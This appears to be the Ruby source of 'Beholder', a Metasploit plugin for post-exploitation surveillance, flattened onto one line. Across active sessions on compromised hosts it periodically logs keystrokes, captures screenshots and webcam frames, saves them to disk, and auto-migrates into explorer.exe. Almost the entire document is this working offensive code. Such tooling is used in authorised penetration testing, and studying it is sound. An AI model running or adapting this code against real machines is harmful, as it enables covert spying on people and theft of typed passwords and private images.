# -*- coding:binary -*- require 'fileutils' module Msf class Plugin::Beholder < Msf::Plugin # # Worker Thread # class BeholderWorker attr_accessor :framework, :config, :driver, :thread attr_accessor :state def initialize(framework, config, driver) self.state = { } self.framework = framework self.config = config self.driver = driver self.thread = framework.threads.spawn('BeholderWorker', false) { begin self.start rescue ::Exception => e $stderr.puts "BeholderWorker: #{e.class} #{e.to_s} #{e.backtrace}" end # Mark this worker as dead self.thread = nil } end def stop return unless self.thread self.thread.kill rescue nil self.thread = nil end def start self.driver.print_status("Beholder is logging to #{self.config[:base]}") bool_options = [ :screenshot, :webcam, :keystrokes, :automigrate ] bool_options.each do |o| self.config[o] = !!( self.config[o].to_s =~ /^[yt1]/i) end int_options = [ :idle, :freq ] int_options.each do |o| self.config[o] = self.config[o].to_i end ::FileUtils.mkdir_p(self.config[:base]) loop do framework.sessions.keys.each do |sid| begin if self.state[sid].nil? || (self.state[sid][:last_update] + self.config[:freq] < Time.now.to_f) process(sid) end rescue ::Exception => e session_log(sid, "triggered an exception: #{e.class} #{e} #{e.backtrace}") end end sleep(1) end end def process(sid) self.state[sid] ||= {} store_session_info(sid) return unless compatible?(sid) return if stale_session?(sid) verify_migration(sid) cache_sysinfo(sid) collect_keystrokes(sid) collect_screenshot(sid) collect_webcam(sid) end def session_log(sid, msg) ::File.open(::File.join(self.config[:base], "session.log"), "a") do |fd| fd.puts "#{Time.now.strftime('%Y-%m-%d %H:%M:%S')} Session #{sid} [#{self.state[sid][:info]}] #{msg}" end end def store_session_info(sid) self.state[sid][:last_update] = Time.now.to_f return if self.state[sid][:initialized] self.state[sid][:info] = framework.sessions[sid].info session_log(sid, "registered") self.state[sid][:initialized] = true end def capture_filename(sid) self.state[sid][:name] + "_" + Time.now.strftime("%Y%m%d-%H%M%S") end def store_keystrokes(sid, data) return unless data.length > 0 filename = capture_filename(sid) + "_keystrokes.txt" ::File.open(::File.join(self.config[:base], filename), "wb") {|fd| fd.write(data) } session_log(sid, "captured keystrokes to #{filename}") end def store_screenshot(sid, data) filename = capture_filename(sid) + "_screenshot.jpg" ::File.open(::File.join(self.config[:base], filename), "wb") {|fd| fd.write(data) } session_log(sid, "captured screenshot to #{filename}") end def store_webcam(sid, data) filename = capture_filename(sid) + "_webcam.jpg" ::File.open(::File.join(self.config[:base], filename), "wb") {|fd| fd.write(data) } session_log(sid, "captured webcam snap to #{filename}") end # TODO: Stop the keystroke scanner when the plugin exits def collect_keystrokes(sid) return unless self.config[:keystrokes] sess = framework.sessions[sid] unless self.state[sid][:keyscan] # Consume any error (happens if the keystroke thread is already active) sess.ui.keyscan_start rescue nil self.state[sid][:keyscan] = true return end collected_keys = sess.ui.keyscan_extract(sess.ui.keyscan_dump) store_keystrokes(sid, collected_keys) end # TODO: Specify image quality def collect_screenshot(sid) return unless self.config[:screenshot] sess = framework.sessions[sid] collected_image = sess.ui.screenshot(50) store_screenshot(sid, collected_image) end # TODO: Specify webcam index and frame quality def collect_webcam(sid) return unless self.config[:webcam] sess = framework.sessions[sid] begin sess.webcam.webcam_start(1) collected_image = sess.webcam.webcam_get_frame(100) store_webcam(sid, collected_image) ensure sess.webcam.webcam_stop end end def cache_sysinfo(sid) return if self.state[sid][:sysinfo] self.state[sid][:sysinfo] = framework.sessions[sid].sys.config.sysinfo self.state[sid][:name] = "#{sid}_" + (self.state[sid][:sysinfo]['Computer'] || "Unknown").gsub(/[^A-Za-z0-9\.\_\-]/, '') end def verify_migration(sid) return unless self.config[:automigrate] return if self.state[sid][:migrated] sess = framework.sessions[sid] # Are we in an explorer process already? pid = sess.sys.process.getpid session_log(sid, "has process ID #{pid}") ps = sess.sys.process.get_processes this_ps = ps.select{|x| x['pid'] == pid }.first # Already in explorer? Mark the session and move on if this_ps && this_ps['name'].to_s.downcase == 'explorer.exe' session_log(sid, "is already in explorer.exe") self.state[sid][:migrated] = true return end # Attempt to migrate, but flag that we tried either way self.state[sid][:migrated] = true # Grab the first explorer.exe process we find target_ps = ps.select{|x| x['name'].to_s.downcase == 'explorer.exe' }.first unless target_ps # No explorer.exe process? session_log(sid, "no explorer.exe process found for automigrate") return end # Attempt to migrate to the target pid session_log(sid, "attempting to migrate to #{target_ps.inspect}") sess.core.migrate(target_ps['pid']) end # Only support sessions that have core.migrate() def compatible?(sid) framework.sessions[sid].respond_to?(:core) && framework.sessions[sid].core.respond_to?(:migrate) end # Skip sessions with ancient last checkin times def stale_session?(sid) return unless framework.sessions[sid].respond_to?(:last_checkin) session_age = Time.now.to_i - framework.sessions[sid].last_checkin.to_i # TODO: Make the max age configurable, for now 5 minutes seems reasonable if session_age > 300 session_log(sid, "is a stale session, skipping, last checked in #{session_age} seconds ago") return true end return end end # # Command Dispatcher # class BeholderCommandDispatcher include Msf::Ui::Console::CommandDispatcher @@beholder_config = { screenshot: true, webcam: false, keystrokes: true, automigrate: true, base: ::File.join(Msf::Config.get_config_root, "beholder", Time.now.strftime("%Y-%m-%d.%s")), freq: 30, # TODO: Only capture when the idle threshold has been reached idle: 0, } @@beholder_worker = nil def name "Beholder" end def commands { 'beholder_start' => "Start capturing data", 'beholder_stop' => "Stop capturing data", 'beholder_conf' => "Configure capture parameters", } end def cmd_beholder_stop(*args) unless @@beholder_worker print_error("Error: Beholder is not active") return end print_status("Beholder is shutting down...") stop_beholder end def cmd_beholder_conf(*args) parse_config(*args) print_status("Beholder Configuration") print_status("----------------------") @@beholder_config.each_pair do |k,v| print_status(" #{k}: #{v}") end end def cmd_beholder_start(*args) opts = Rex::Parser::Arguments.new( "-h" => [ false, "This help menu"], ) opts.parse(args) do |opt, idx, val| case opt when "-h" print_line("Usage: beholder_start [base=] [screenshot=] [webcam=] [keystrokes=] [automigrate=] [freq=30]") print_line(opts.usage) return end end if @@beholder_worker print_error("Error: Beholder is already active, use beholder_stop to terminate") return end parse_config(*args) start_beholder end def parse_config(*args) new_config = args.map{|x| x.split("=", 2) } new_config.each do |c| unless @@beholder_config.has_key?(c.first.to_sym) print_error("Invalid configuration option: #{c.first}") next end @@beholder_config[c.first.to_sym] = c.last end end def stop_beholder @@beholder_worker.stop if @@beholder_worker @@beholder_worker = nil end def start_beholder @@beholder_worker = BeholderWorker.new(framework, @@beholder_config, driver) end end # # Plugin Interface # def initialize(framework, opts) super add_console_dispatcher(BeholderCommandDispatcher) end def cleanup remove_console_dispatcher('Beholder') end def name "beholder" end def desc "Capture screenshots, webcam pictures, and keystrokes from active sessions" end end end